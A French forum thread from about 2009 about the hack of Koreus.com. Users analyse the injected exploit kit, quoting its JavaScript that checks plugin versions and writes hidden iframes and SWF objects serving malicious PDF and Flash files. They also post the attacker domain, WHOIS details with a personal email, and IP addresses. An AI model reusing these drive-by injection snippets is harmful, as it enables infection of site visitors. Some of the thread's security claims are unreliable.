A propos du site : Le serveur de Koreus.com s'est fait hacker

A je comprend mieux pourquoi ça marcher pu. Perso j'ai lancer tout mes anti virus, anti spyware, anti trojan anti puce..eu non ca c'ets pour mon chien désolé ^^

Franchement, ça craint ^^' c'est l'occasion ou jamais pour moi d'installer un antivirus tiens --'...

Et désolée, je suis très nulle en informatique (geek, mais sans plus :P) donc aucune info sur ce virus

Enfin en espérant qu'il n'y aura pas d'autres problèmes dans ce genre... pas cool le hacker:x

C'est l'occasion de se demander a quel but le gars a fait ça...

Surement que c'était pas juste pour s'amuser.

Bref, merci pour le retour online du site.

C'est aussi l'occasion de dire : Firefox RuleZ

C'est intelligent tout plein dîtes moi... Enfin, je ne pense pas que ce virus ai quelque chose de méchant à faire dans les PC... peut être un peu de rame en prime mais pas difficile à virer.

Koreus is back et c'est ce qui compte.

c'est ce qui arrive quand un site devient de plus en plus populaire !!:-D ce n'est pas de votre faute, et rien de méchant puisque aucune donnée n'a été perdue. :lol:


(firefox devient de plus en plus utilisé, y a donc de plus en plus de failles qui sont trouvées/exploitées, c'est pas vraiment de la faute de mozilla) ...

mmmmmm.... il voulais faire un fake surement... :gratte:

Moi je dormais donc l'histoire de virus je m'inquiète même pas

Premier à relayer l'info

comme quoi le risque 0 n'exsiste pas

Inscription éclair et donc premier message sur ce site que je suis à l'occasion

Pour te répondre quant à la dangerosité du virus sur les internautes visitant ton site.. (Attention je ne suis pas un expert non plus mais j'observe à droite à gauche donc corrigez moi si y'a une erreur)

Le simple fait d'afficher une page d'un site pour être dangereux suivant la page que l'on cherche à afficher.

En effet, il est possible d'injecter dans une page un virus type trojan qui sera téléchargé par le navigateur à l'ouverture d'où le déclenchement parfois des antivirus.

Une page internet est constitué de plusieurs éléments. Du Html qui représente (schématiquement parlant) simplement du texte sur une page blanche non mis en forme et un fichier css (ou plusieurs) qui eux sont la mise en forme de ce texte, le placement des cadres mais aussi le téléchargement des images de fond, icones ou des scripts php s'il y a.

Par conséquent il arrive que des petits malin injecte dans le code source d'une page une ligne indiquant que le navigateur doit télécharger un fichier type trojan. Le Trojan ouvre donc un port qui permet ensuite au pirate de s'introduire dans votre ordinateur pour obtenir des informations ou même injecter un virus dangereux. Donc le risque est réel et important.

Néanmoins, même si le risque zéro n'existe pas, la mise à jour régulière de votre système tend à éliminer les failles dont se servent ces pirates pour vous attaquer à priori.

Corrigera celui qui verra une bétise dans mes propos bien entendu car ça reste hypothétique et basé sur mes maigres connaissances.

Ce gars doit vraiment avoir une vie de merde pour faire ca.
Y en à qui tombe bien bas...

Firefox a une faille en se moment et une nouvelle version (3.5.1 je crois) va sortir pour corriger ce problème , peut être que son but avait un rapport avec sa ...

Le patch 3.5.1 est sorti avant-hier et en effet il corrigeait plusieurs failles même dont de souvenir une critique.

LOL c'est pas une new vidéo ça ^^.
Bref on attend la suite

Faaakkkkeee !!!!:-x

Pardon, content que les choses soient revenues à la normale. Aucune altération aux premiers abords sur mon pc pour ma part.

C est pas pour fair mon parano ou otre...

Mais les personnes qui font les virus et tout sa c est pas les vendeur d anti-virus ? (Plus de virus plus besoin d anti-virus).

Enfin c'est ce que je pense personnellement apré sa peu ètre otre chose :gratte:

Pour répondre aux question de virus se propagant sur une page web c'est effectivement possible. Rien qu'en visitant une page contaminé on peut choper ce virus. Donc il y avait bien un rique tous à vos antivirus!

Sinon Pwedator je ne pense pas que ce soit les concepteur d'antivirus qui créer des virus ... . Les pirates injectant ces trojan peuvent récupérer une massa d'info qui peuvent ensuite être exploiter de diverse manière (usurpation d'identité, fraude bancaire, ... ).

Vengez koreus !

http://bn2z.cn/config/
(si vous arrivez à trouver le mot de passe du gars)

Lut,

Il semblerait qu'on ait à faire à ça

edit: couplé à ça

/scan antivirus

Firefox 3.5 avait une faille javascript qui permettait d'exécuter un *.exe à notre insu... (corrigée hier avec la version 3.5.1)

http://www.certa.ssi.gouv.fr/site/CERTA-2009-ALE-012/CERTA-2009-ALE-012.html


cool le site est hébergé en chine :oops:

Personnellement me suis connectée vendredin mon antivirus s'est déclenché en me disant que le site était infecté

donc je pense que l'on ne risque rien désolé pour toi Koreus

en tout cas même sur 2 jours ton site nous a manqué

Ils peuvent pas réviser, ces vieux kévin qui hackent les sites ???

:0: pour le gar qui à fait sa

Pff le pire c'est que le mec qui a fait sa il doit connaitre le koreus enfin le site koreus donc il est peut etre inscrit :oops: et dsl a toi koreus.

Au fait le site sur lequel on tombait il parlait de quoi ???

Si c'est Avast qui protege le serveur pas étonnant que le hacker soit facile

Petite précision :
Une page contenant du code malveillant + un navigateur pourri ou pas a jour (ex IE ou FF3.5) ca donne un PC totalement accessible au pirate pour par exemple envoyer un petit cheval de troie, une backdoor et hope le PC est accessible a distance n'importe quand donc ATTENTION !!!
Ne pas croire qu'un antivirus nous met a l'abri de touts les ennui, encore moins avec Avast...
Parmis les solution possible y'a la machine virtuel pour aller sur le web (c'est bourrin mais fiable) ou alors navigation en compte inviter mais + simple couper l'acces admin au navigateur via une extension pour FF (isadmin je crois) ou dropmyright qui est fourni par M$ et fonctionne avec toutes les applis (lisez la doc pour l'utiliser c'est simple)

L'utilité de hacker des sites, populaire de préférence, c'est d'avoir un max de victime donc de PC a disposition soit pour recup les données perso qui seront vendu a pris d'or aux spammeur et autres vermines, ou alors faire des réseaux de PC zombies pour diffuser ces spams par exemple.

Gardez Windows a jour, utiulisez un autre navigateur que IE , gardez le a jour (a l'exception de FF qui semble + sécurisé en version 3.0 que 3.5) et faites attention aux sites ou vous allez, le cas de Koreus est spécial car une rédirection ou modification on la vois qu'au dernier moment quand il est trop tard

En esperant que ca aidera ceux qui se pose des questions.....

@nosferatus76
T'es dans le vrai, juste préciser que le HTML ca créer des blocs qui sont en forme par le CSS, le PHP est coté serveur donc il n'a rien de méchant pour le visiteur, c'est le JavaScipt qui est mauvais car il a potentiellement acces a tout le PC donc il est facile de faire tout et n'importe quoi a distance et discretement, d'ou certaines options et extension qui désactive le javascript, je ne les conseil pas mon site étant plein de JS ^^ (mais du gentil JS bien sur)
La prudence est maitresse...

@StarSky
Les produits Ad0be sont toujours blindé de failles et ultra lourd... Ca parait incroyable que y'en ai qui les utilisent encore...

De plus un trojan peut être rendu indétectable pour les antivirus, ca serait bien d'en savoir un peu plus si on a dl un fichier de merde ou non.

Moi j'ai même pas put allez sur Koreus, comme si j'avais pardu ma connexion, et donc j'ai pas pu avoir de virus. :gratte:

Vraiment pas de vie les mecs qui hackent ... Aucune utilité si ce n'est emmerder le monde.

Pour répondre à un des membres ci-dessus, il me semble que c'est déjà arrivé que des créateurs d'anti-virus, spyware ... et tout le tralala aient publiés eux-mêmes des virus dans un but purement commercial, enfin, c'est ce qu'il me semble Mais il ne faut pas oublier que les entreprises qui créaient les anti-... ont des équipes qui créaient des virus pour tester justement la fiabilité mais eux le font seulement sur un serveur privé leur appartenant.

S_o_N, avast reste un très très bon anti-virus, il est fiable, une qualité de service de mise à jour plus que correct, léger, et gratuit, mais pour qu'une protection optimale soit garantie, il faut combiner les logiciels, non pas d'anti-virus sinon il y a des conflits, mais en ajoutant un anti-spyware (Spybot), un anti-malware (A-squared Free) et bien entendus à côté de sa faire les mises à jour de tous ces logiciels dès qu'il le peut, après un nettoyage complet, Ccleaner est très utile aussi en finition, ainsi qu'en réparation d'éventuelles erreurs.

La liste de ces programmes est bien entendue gratuite et fiable Mais méfiez-vous des copies de ces logiciels qui quant à elles cachent le plus souvent des spyware et virus.

qq'un peut me dire si les utilisateurs de mac avec firefox risque aussi l'infection? :bizarre: :gratte:

Y a moyen de tester son antivirus, suffit d'aller sur http://securite-informatique.info/virus/eicar/

un active X de chez microsoft permet d'avoir un accès en écriture/lecture.

Bon j'espère que tu as fait le nécessaire Koreus, c'est pas la deuxième fois que cela arrive ?

Bref protégez bien vos Ordi et vise et versa hein koreus !!!

merci

[Compte supprimé]

Le script s'attaque à deux choses: flash player 9.0.(123 et inférieur) et le plugin Adobe Acrobat pour IE et firefox (p-e autre navigateur comme Safari).

Dans le premier cas, il permet l'exécution de code arbitraire.

Dans le 2ème cas il semble permettre la récupération de cookies en vue d'un vol de sessions.

Donc il semble que l'OS utilisé ne mette pas à l'abri de ce code.


Doc:
http://www.mag-securs.com/article.php3?id_article=6940

http://www.depannetonpc.net/actualite/lire_2795_faille-critique-adobe-flash-player-9.html

JS:Obfuscated-BN [Trj] : ce nom en lui même ne décrit pas un virus, mais juste que la page visité fait un appel "obfuscated", comprendre "masqué" vers un site qui lui est verollé, ici par un trojan.
Quand je charge la page indiqué IE8 m'indique que le site essaie de lancer le plugin RealPlayer...Donc je pense que c'est le logiciel concerné !

Edit : Pour la faille PDF il faut charger un PDF ce qui n'est pas le cas de la page en question, et la faille flash date de 2008 donc corrigée...

ce qui se passe c'est que le script tente d'ouvrir un swf (vidéo).

Le fichier contient des erreurs et n'est donc pas décompilable:

movie '/home/XXX/Bureau/script/getfile.swf' compressed // flash 9, total frames: 1, frame rate: 24 fps, 55x40 px

fileAttributes attrActionScript3

// unknown tag 86 length 11

// unknown tag 82 length 32276

// unknown tag 76 length 10
end

On est bien en la présence de la faille de sécurité que j'ai citée plus haut pour Flash Player.

Pour ce qui est d'Acrobat, il tente l'ouverture de deux fichiers pdf vides afin de lancer le lecteur pour pouvoir exécuter du code malveillant.


Ca sent pas bon à ce niveau là, vu que toutes les versions Acrobat semblent touchées.

Je confirme ce que dit StarSky, c'est sans doute une tentative de vol de session en récupérant les cookies.
Cependant le hacker ma l'air inexpérimenté car avant l'attaque finale il a développé un petit script javascript qui ne sert à rien pour tester la faille.

Il semble également qu'il provienne des pays de l'est car les noms de variables ne donnent aucun résultat quand on fait une recherche sur google en caractère latin.

Pour ce qui est des virus qui peuvent se cacher des antivirus, c'est possible mais uniquement si le virus est d'un type inconnu et est cripté. Vu la relative inexpérience du hacker cela m'étonnerais. A mon avis on a affaire à un jeune russe hacker qui s'est essayé sur un site au hasard.

j'ai étudié le code et je suis d'accord avec StarSky

Citation :

Pour flash, si votre Player est à jour, aucun danger.

Pour les PDF, je te laisse observer cette partie du code et changer d'avis

if( detectAcrobat_2 )
{
var ver = GetAcrobatVersion();

if( ver >= '9.0' )
{
document.write("<iframe src='getpdf.php' width=1 height=1 frameborder=0></iframe>");
return true;
}
else
{
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
return true;
}
}

if( detectAcrobat_1 )
{
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
return true;
}

le mec qui a fait ça trouve surement que les vidéos de MicAy sont merdiques

Citation :

Ca ne lui sert à rien, mais ça nous a permis d'orienter nos recherche afin de trouver la faille exploitée, ce qui est très débile de sa part

Je pense que le mec qui a codé ce script est Turc.
la variable "neden" veut dire pourquoi en Turc

Élémentaire !!! PS : LOL

Citation :

Je pense surtout que ton Flash Player n'est pas mis à jour... tu as la version 9.0.(<123) ?

ça sent le botnet.
le mec n'a pas signé son virus.

Okay okay on parle de qui sa peut être, de quelle faille sa peu venir, mais on parle pas de comment détruire le virus.. :gratte: :bizarre: Est ce qu'une analyse via l'anti virus suffit? (pour moi Antivirus Firewall de Orange)...
PS : j'ai lancer un annalyse rapide pour voir en premier lieu ce qu'il y a avait et j'ai découvert 2 spyware... mon pc a été formater la semaine derniere :-? de plus je trouve qu'il rame plus ces dernier jours:-o
++

On peut pas faire grand chose... un vol de session n'attaque pas directement ta machine mais permet d'usurper ton identité sur des sites pour une durée plus ou moins courte. (définie par le serveur).

Dans le cas de Koreus c'est pas dramatique, contrairement à un site gérant des transactions banquaires (e-commerce, ...)



Infos sur la faille flash:

En ce moment c'est le Chaos Communication Camp à Berlin. Pour raccourcir, c'est un congrès de hack3rz qui font des conférences/comptes rendus sur les exploits, failles et autres menaces qui leurs sont chères.

David Neu rend donc publique une faille découverte dans Action script 3 permettant de scanner les ports TCP a partir d'un SWF flash si celui ci contient une vidéo encodée en interne. Le hic c'est que le player flash se trouve en général derrière les firewall des sociétés sensés protéger de ce genre de scan. Il serai donc parfaitement possible de scanner complètement un réseau local puis de renvoyer les infos sans que le firewall n'y voit rien. Ah oui, toutes les versions de Flash 9 sont affectées par le problème.
Publié par Ultr4 à l'adresse 10:05 AM

Source: http://cub3.blogspot.com/2007/08/faille-de-scurit-flash-9-action-script.html


Plus méchante que l'autre. Il y a peu d'infos qui circulent pour savoir à quelle occasion le pirate peut accéder à la machine...

Je conseille de mettre de jour votre antivirus, de déployer un firewall configuré correctement et de prier.

Citation :

Si tout est à jour chez moi ! Pourquoi, tu pense que c'est grave que je vois ca ?
Je n'ai aucun antivirus sur mon ordi.

Pour résumer en ce qui concerne l'exploitation version pdf, le virus commence d'abord par ajouter des scripts javascript dans la page avec la commande document.write(), le script est codé bizarrement dans un tableau, je n'ai pas bien saisi l'intérêt. Ensuite ce script vérifie quelle est la version du plugin de adobe. En fonction de la version il fait télécharger au navigateur deux pdf différents (avec getfile.php?f=pdf et getpdf.php). Enfin ces pdf vérolé sont en réalité un exploit signé par abyssse security inc, il suffit d'ouvrir le pdf avec un éditeur de texte pour le voir :

/Abysssec Inc Adobe Exploit \055 http\072\057\057abysssec\056com\057)

ensuite un peu plus loin il y a l'air d'y avoir deux shellcode, probablement un qui crée une faille et qui fait pointer sur le deuxième schellcode qui est executé (supposition). Reste à savoir à quoi sert ce shellcode, je n'ai pas encore compris.

Il serait je pense primordial de vérifier qu'un shell n'a pas été dissimulé sur le serveur http car dans ce cas ça serait une porte assurée pour un prochain hack même si le serveur a été sécurisé

Le script réagit à deux critères :

Il test la version du player flash et
1) si elle correspond à une version contenant la faille visée, il ouvre un fichier swf vidéo.
2) sinon elle ne tente pas l'ouverture.

Donc si tu vois qu'un fichier vidéo tente de s'ouvrir, ça voudrait dire que tu es dans le cas 1)


Source:

if (version_major == 9 && version_rev < 124){
document.write('<div id="flashcontent">' + makeSWFObject('getfile.php?f=swf', 'mymovie', '0.1', '0.1', '9', '#000000') + '</div>');
return true;
}



Si tu veux tester ta version, tu peux copier/coller ce code dans un fichier .html et l'ouvrir dans ton navigateur.

<html>
<head>
<script type="text/javascript">
function letsSWF() {
var PlayerVersion = [0,0,0];
if (navigator.plugins && navigator.mimeTypes.length){
var x = navigator.plugins["Shockwave Flash"];
if (x && x.description) {
PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split(".");
}
} else if (navigator.userAgent && navigator.userAgent.indexOf("Windows CE") >= 0){
} else {
try{
var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if (axo != null) {
PlayerVersion = axo.GetVariable("\$version").split(" ")[1].split(",");
}
}catch(e){}
}
var version_major = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0;
var version_minor = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0;
var version_rev = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0;
alert('Version Flash: ' + PlayerVersion);
}
letsSWF();
</script>
</head>
<body>
</body>
</html>

J'ai la version 10.0.22.87 :bizarre: :gratte:

@Alexis625
On sent le mec qui connais QUE avast ske le poto dit que c'est bien, désolé d'etre désagréable mais faire courire le bruit que avast est bien c'est mal !!!
Va faire un tour sur les VRAI site de désinfection style malékal, tu vera que avast est une plaie, il n'est pas fiable (beaucoup de faux +) pas mis a jour régulierement (exemple simple le virus de MSN que avast a mis des mois a détecter, je parle meme pas de le supprimer), il est + que lourd avec ses 7-8modules et l'analyse est super lente, ce que j'affirme c'est du vécu + du vue sur de nombreux forum et PC d'amis. Quant a SpyBot j'ai fini par l'abandoné car module résident posait probleme, lourd et pas bien fiable, et Asquared j'ai un ami qui le connais depuis ses début, je l'ai testé quelques peu et c'est faux + sur faux + c'est affreux...
Ccleaner ne protege mais peut etre utile, + que regcleaner qui est une horreur en tout cas...

@StarSky
Merci du lien vers Eicar, je l'avais encore perdu.
Il s'agit uniquement de la signature d'un virus donc aucun danger mais il est également peu fiable en tant que test car ancien donc n'importe quel antivirus peu l'avoir ajouter dans sa base sans pour autant etre fiable. Mais ca peux etre utile pour voir la profondeur de recherche de l'antivirus (virus zipper, rezipper, rerezipper, etc...) Avast et Antivir n'ont pas de limite de profondeur par exemple, je vais tester Comodo au passage mais j'ai peur du résultat

Les bons lieux pour avoir des infos c'est ici (entre autres) :
http://www.malekal.com/
http://www.matousec.com/

Pour ma part c'est Antivir et Comodo pour le part feu, car avec un partfeu pas de fuite en théorie (seulement car une backdoor au milieu d'un fichier windows inoffensif et hop ca passe, mais pour en arriver la...)

Pour finir, vivement que silverlight mange flash... C'est du M$ mais c'est + léger, bien mieux, et sera difficilement pire pour ce qui est des failles critiques...

salut je voulez juste dire au webmasteur que moi aussi j'ai était contaminé par ton virus depuis vendredi voila que tu sois au courant que meme les utilisateurs de ton site ont pu etre contaminé

Moi qui ai payé par internet aujourd'hui
Enfin bon, on ne peut pas vraiment reprocher ça à koreus, beaucoup de sites ont des failles. Et si ce ne sont pas des failles connues, il y aura toujours un mec qui trouvera une nouvelle faille.
En espérant juste que le compte de ma mère sera pas vidé demain xD.

(Koreus, l'excuse du hacker pour justifier une semaine de vacances c'est pitoyable !)

Dieu est grand, koreus aussi

bonne chance et bon retour

j'ai mis mes identifiants et mon mot de passe=x
ça craint ?

autant il a relevé mon mot de passe pour pirater mon compte=x

sinon je change le mot de passe ?

C'est ça l'avantage quand tu t'appelles naruto_du_75, il y a tellement de mecs qui ont ce pseudo que le hacker risque de se tromper de personne:p.
Sans dec, ton compte sur koreus, c'ets ce à quoi tu tiens le plus ^^?

Un petit whois et...

WHOIS information for bn2z.cn :
[Querying whois.cnnic.net.cn]
[whois.cnnic.net.cn]
Domain Name: bn2z.cn
ROID: 20081219s10001s48156309-cn
Domain Status: ok
Registrant Organization: NetworkProtect
Registrant Name: TiankaiCui
Administrative Email: cuitiankai@googlemail.com
Sponsoring Registrar: ������������������������������������
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2008-12-19 05:22
Expiration Date: 2009-12-19 05:22

Tadaam

Système d'exploitation, navigateur, anti-virus version de flash player ou autre... quelque soit votre configuration il y a des risque ! Personne peut se dire a l'abri de piratage, même les plus gros système donc no stress ! Pour ce qui est de ce piratage il est apparemment (pour le moment) sans grosse conséquences si ce n'est 2 jours sans notre site préféré ! Et il faut arrêter la peur bleu du virus, 99% de ceux ci ne sont pas méchants et les 1% restants ils ne s'adressent pas a nos petit PC ! Au pire il vont récupérer des informations sur nos machines mais si on a peur de ca alors il ne faut même pas aller sur internet ! Et pour les trojan encore une fois que va faire un hacker avec un accès a notre machine ? Rien de bien méchant, au pire pénible !
Enfin si vous avez toujours peur il ne reste qu'une solution : Acheter un firewall à 30 000 bal ! ^^ non déjà faire des sauvegardes sur des supports tel que le CD (non RW) et mettre ces données confidentielles sur une machine qui n'est pas reliée à internet !
Bonne soirée à tous...

Pas cool, étant aussi webmaster de plusieurs serveurs je crains toujours ce genre de merde.
J'ai déja eu des petits malins qui trouvaient une faille pour implanter un bout de javascript dans un post*, le problème étant réglé en améliorant les filtre à coup de regex prise de tête.
Le blocage de classe d'IP de provenance douteuse peut-etre aussi efficace.

Enfin j'ai rien vu passer, surtout que je n'ai pas d'anti-virus sur mon PC...Je suis sous Ubuntu...uhuhu

Longue vie à Koreus et bravo pour le boulot !


* par exemple, le bout de javascript substitue la page en cours par une page identique à la page de connexion, page étant placé sur un autre serveur. L'utilisateur pensant que sa session est fini, se reconnecte en fournissant son login et son mot de passe... Ces éléments sont récupérés par le hacker qui va donc les réutiliser pour se logger sur le serveur. A partir de là il récupère le plus d'information qu'il peux, email, messagerie privée etc...
Et comme souvent l'utilisateur lambda utilise le même mot de passe pour plusieurs sites (tient j'en vois qui pincent leurs lèvres), je vous laisse deviner la suite...

Cette adresse mail retourne un tas de résultat explicite sur google : cuitiankai@googlemail.com
Apparemment, il (ou elle :-P) a d'autres noms de domaine dans le même style comme klikvs.cn

En effet, ça explique le beug, mais comment es-ce possible ? Si quelqu'un sait comment il a fait, expliquez le moi en bref s'il vous plaît :roll:
(je ne veux pas deviner hacker mais ingénieur en informatique) et comment vous vous en êtes débarrassé ?

Si non, c'est pas cool de faire ça à un si bon site. ( c'est pas cool même pour un site médiocre d'ailleurs )

Je ne peux pas regarder le code source car norton détecte un risque qui essaye de rentrer dans l'ordinnateur , donc le risque est bien dedans ... et j'ai une question : est ce que les mot de passe sont cryptés dans le serveur ?

Les mots de passes sont stockés dans une base SQL, qui est généralement séparée de l'espace de stockage du site.
C'est la partie du site qui a été infectée. (Je suppoz)

Bonjour à tous
j'appuie ce qui as été dit plus haut au niveau des antivirus le plus puissant à l'heure actuelle est celui situé entre le clavier et la chaise.
sinon antivir+un pare feu autre que celui de windows)
et pis c'est tout pour le domaine j'ai fait mes recherche et j'avance mais je but, un poxy à ip dynamique je pense assez louche comme redirection. les ip que j'ai relevées sont :
74.208.109.155 => celle ci est américaine
218.93.202.100 => celle ci revient fréquemment est ce situe à Suquian en Chine.
C'est un apache2 à jour sur le serveur
Je vais continuer mon investigation.
Je suis moi même admin de serveurs et j'aime pas trop les types dans ce genre donc...
[code]
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 218.0.0.0 - 218.255.255.255
CIDR: 218.0.0.0/8
NetName: APNIC4
NetHandle: NET-218-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: TINNIE.ARIN.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-info/whois_search
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse.
RegDate: 2000-12-07
Updated: 2009-06-01

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2009-07-18 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
[code]

Ah oui un conseil achetez des post-it pour vos mots de passes et n'utilisez pas toujours les mêmes et surtout ne le stockez pas sur votre pc, car en toute logique si vous demandez à votre navigateur de s'en souvenir il faut bien qu'il stocke ce mdp quelque part non ?
enfin voila moins vous un gardez via votre navigateur mieux vous vous sentirez.
un simple .exe peut récupérer tout vos identifiant et mots de passe en moins de temps qu'il en faut pour le dire.

Ah ok je t'es spotted Koreus

http://forum.avast.com/index.php?topic=46918.0

edit : tu commencais à me manquer d'ailleurs à quand le prochaine article?

Bien joué manga

Citation :

Et moi qui pensais que Koreus ferait de la pub pour Chrome... Même pas...

Citation :

Haha non, en faits j'n'ose pas imaginer les réactions... Bien joué...

Sinon pour sortir du HS, ça fait vraiment zizir que Koreus.com soit de retour. Aller, avoue... C'est un coup monté pour te faire de la pub tout ça...

Perso, je n'ai même pas eu de déclenchement d'anti-virus de mon coté. Le site n'était tout simplement pas accessible mais rien de plus...

edit: et oui... bien joué manga...

@tinou
Que va faire un hacker avec ton PC ? Ho rien, juste y mettre un keylogger pour recup tes coordonnées banquaires et divers MDP, l'implanter dans un réseau de PC zombie, utiliser ton IP sur des sites peux recommendable, etc... 3 fois rien quoi...
Alors oui c'est rare, oui faut le faire expres (et crois moi que ca va vite meme quand on est méfiant, je dis pas ca pour mais pour des gens que j'ai désinfecter plusieurs fois qui connaissent les danger mais n'en font rien), mais les PC zombie ca compte par milliers voir meme par millions, ca commence a faire donc faut pas prendre ca trop a la légere et comme c'est quasi indétectable...
Payer un prix exhorbitant en logiciel de sécurisation n'est pas la solution, aucune n'étant fiable a 100% y'a toujours des risques

Et pour ceux qui se demande encore l'utilité, c'est le pognon, etre hacker, gentil ou méchant ca gagne enormement, vente des données privée a prix d'or pour les méchant, sécurisation des systemes/sites de grosses boites pour les gentils...

@manga
mdr bien vu

Salut à tous ... Je suis développeur web, et j'ai quelques sites internet. J'ai moi aussi été hacké de la même manière que sur le site de Koreus. J'espère que tu as bien sécurisé ton site car après avoir tout nettoyer mon site, ils ont recommencé à hacker.
C'est un gros site qui lance tout ces hack. Il y a maintenant 2 semaines que je n'est pas eu de souci mais plusieurs fois de suite j'ai re-eut des iFrame injecté dans mon code source. Ils n'utilisent pas forcément une faille javascript (d'après moi) mais plus un formulaire ou un truc comme ça ... J'avais lu qu'ils avaient hacké 296 sites en 1 jour:-o:-o.

Bref j'epère que tout ira mieux sur Koreus

Aucun probléme pour moi, RAS !

Oula tous les GEEK on sortis le grand jeu, mais je suis quand même rassurer mais vous avez pas réussi à me convaincre.

Certain disent Ouvrir une page internet x c'est dangereux d'autres disent que non ! ^^

Faut savoir !

Mais perso je ne détecte pas de virus ni trouve de différance !

Effectivement, il est plus sûr d'utiliser des équivalents gratuits (souvent dix fois plus légers) à la place des usines à trous d'adobe.

Sinon, si tout le monde était sous FF à jour avec les addons noscript et adblockplus personne n'aurait pris de risque.

@StarSky :
Ca peut pas être cette faille là car le camp du CCC c'était en 2007 et que le prochain c'est en 2011 (c'est tout les 4 ans). Et puis faire un scan des ports tcp sur des machines au pif ne lui sert pas à grand chose ...

@pituite :
Tu pourrais m'envoyer les shellcodes ? J'ai quelques compétences en assembleur, je peux essayer de les comprendre.

@h2ofranck :
J'adore narguer les linuxiens : t'es à l'abri de rien derrière ton linux, c'est moins sécurisé que windows qui lui rend la stack non executable (bon c'est pas infaillible non plus ^^); en cas d'attaque directe, tu risque de tomber tout aussi rapidement que windowsien ^^

waw, violent :s

Mais tournant sous mac je ne pense pas avoir ete infecte. 98% des virus ne passent pas sous mac. J'espere ne pas faire parti des 2% :s

Citation :

Ce qui s'est passé sur Koreus répond à ta question.

Les navigateurs et les plugins ne sont pas exempts de failles, donc surfer comporte un risque.

Citation :

Sauf qu'on a pas les droits admin par défaut sous Linux... ce qui limite vraiment le champ d'action des virus.

@kaligolem
FAUX, faut arreter de croire que FF est un coffre fort, regarde la version 3.5 et meme 3.5.1, Mozilla est obligé de contredire les accusations de failles pour pas se tapper la honte... C'est un tank oui, avec toutes les ressources qu'il bouffe, mais pas un coffre fort.

@Starsky
Il existe plusieurs facon de pas donner les droits admins au navigateur, je les ai cité + haut, le prob c'est qu'apres ca pose quelques problemes (pas d'acces a certains lecteur pour enregistrer les fichiers par exemple...) donc c'est chian, je parle pas du compte invité on tu peux carrement rien faire
Mais c'est vrai que sous linux c'est mieux foutu, c'est aussi faisable sur windows mais que le pro je crois et je sais pas comment le mettre en place.

oué juste je me disai bien pake a chaque fois que je voulais venir sur ce site ben mon antivirus me disai un virus a été trouver et puis plu moyen d'y acceder j'ai failli peter un plomb pake internet sans koreus c'est plu internet mais voila tout est redevenu dans l'ordre ;p

je ne vois ça que maintenant lol, mais merci koreus pour prendre soin de nous et bon courage m^me si c'est fini

merci koreus !

Citation :

Sauf que les failles pour obtenir un root access sous linux sont légion et qu'il est possible de cracker le mot de passe root de linux. Mais bon c'est vrai que le système root sous linux est utile pour ralentir les attaques et que le porter sous windows serait une très bonne idée (ne me parlez pas du UAC !).

Un conseil, pour le respect de la vie privée, n'utilisez pas Chrome pour vos opération d'achat sur internet, bancaires,etc(ni l'OS de Google qui devrait sortir prochainement)

Les produits de google sont infestés de récupérateurs de données, il suffit de faire le test avec un gmail et de voir que les pubs qui apparaissent sont en relation avec les emails que vous envoyez. Donc pour plus de sécu n'utilisez pas chrome pour des trucs importants

@whowho
je vais pas contredire les rumeurs sur Google et sa politique de respect de la vie privée, y'a du vrai et du faux, a savoir que Chrome est Open source et qui si effectivement Google y avait mis un gros spy on serait au courant...
En tout cas si tu connaissais un peu + le sujet tu saurais que les pubs affichée tienne compte en effet du contenu des mails mais c'est fait par des bot pas des + intelligent : apres avoir écrit "quel pied" (non pas de truc louche m'enfin) j'ai eu droit a des pubs pour les chaussures : FAIL !
Exemple assez spécial, un bon piege certes mais c'est pas le seul...
Google ne récupere pas de données en clair mais observent les habitudes des internautes pour...... mieux cibler les pubs en grande partie mais ca c'est aussi le cas des visiteurs de sites utilisant Google Analystic, etc, etc... donc t'y échappe pas vraiment...

@R5evan
mdr si si l'UAC c'est le meme principe, sauf que sur linux changer l'heure ne ressemblais pas a une tentative de piratage:p
Windows 7 est bien mieux fait a ce niveau la, l'UAC trouve vraiment son utilité mais casse pas les pieds ^^ (NON je veux pas de chaussure )

juste pour répondre a Alexis625, t'es vraiment sur que les concepteur d'antivirus il lancent des virus ... ? LOL

C'est comme la grippe A c'est les laboratoire de vaccin qui l'ont injecté aux gens ...

Ou alors c'est Christine A. qui maintient a jour les serveur d'emule ... .

Moi je m'en fous un peu, j'ai un Mac donc je risque pas grand chose… En plus j'étais pas là!

ha ha ha ha ha